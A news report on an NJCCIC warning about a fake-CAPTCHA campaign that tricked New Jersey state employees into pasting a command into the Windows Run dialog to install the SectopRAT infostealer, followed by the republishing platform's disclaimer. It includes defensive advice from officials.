Cybersecurity analysts in New Jersey flagged an alarming malware scheme this week targeting government employees through fraudulent CAPTCHA challenges. The New Jersey Cybersecurity and Communications Integration Cell (NJCCIC) revealed on March 20 that the attackers sent emails to state workers containing links to deceptive or compromised websites posing as security checks. According to NJCCIC:
The emails contain links directing targets to malicious or compromised websites and prompting deceptive CAPTCHA verification challenges.
These challenges were designed to fool users into running dangerous commands that secretly installed the SectopRAT infostealer.
The method was particularly sophisticated, using a clipboard-based trick to conceal its intent. Victims who clicked on the link were directed to a fake CAPTCHA page that automatically copied a command. The website then instructed users to paste the command into the Windows Run dialog as part of a supposed verification step. Although the final part of the pasted text read like a standard message—“I am not a robot – reCAPTCHA Verification ID: ####”—executing the command in fact launched mshta.exe, a legitimate Windows executable used to fetch and run malware disguised in common file types.
NJCCIC traced the campaign to compromised sites that used widely adopted tools: “Further analysis indicated that the identified compromised websites used technologies such as the WordPress Content Management System (CMS) platform and JavaScript Libraries.”
The investigation also uncovered a supply chain component targeting auto dealership websites via a compromised video service. Infected visitors risked downloading the same infostealer. Meanwhile, cybersecurity researchers documented related operations distributing other malware types:
Researchers also discovered similar fake CAPTCHA malware campaigns deploying Lumma and Vidar infostealers and stealthy rootkits. Legitimate CAPTCHA verification challenges validate a user’s identity and do not require users to copy and paste commands or output into a Windows Run dialog box.
Officials advised system administrators to update software, strengthen CMS credentials, and report incidents to the FBI’s Internet Crime Complaint Center and NJCCIC.
免责声明:本文章仅代表作者个人观点,不代表本平台的立场和观点。本文章仅供信息分享,不构成对任何人的任何投资建议。用户与作者之间的任何争议,与本平台无关。如网页中刊载的文章或图片涉及侵权,请提供相关的权利证明和身份证明发送邮件到support@aicoin.com,本平台相关工作人员将会进行核查。
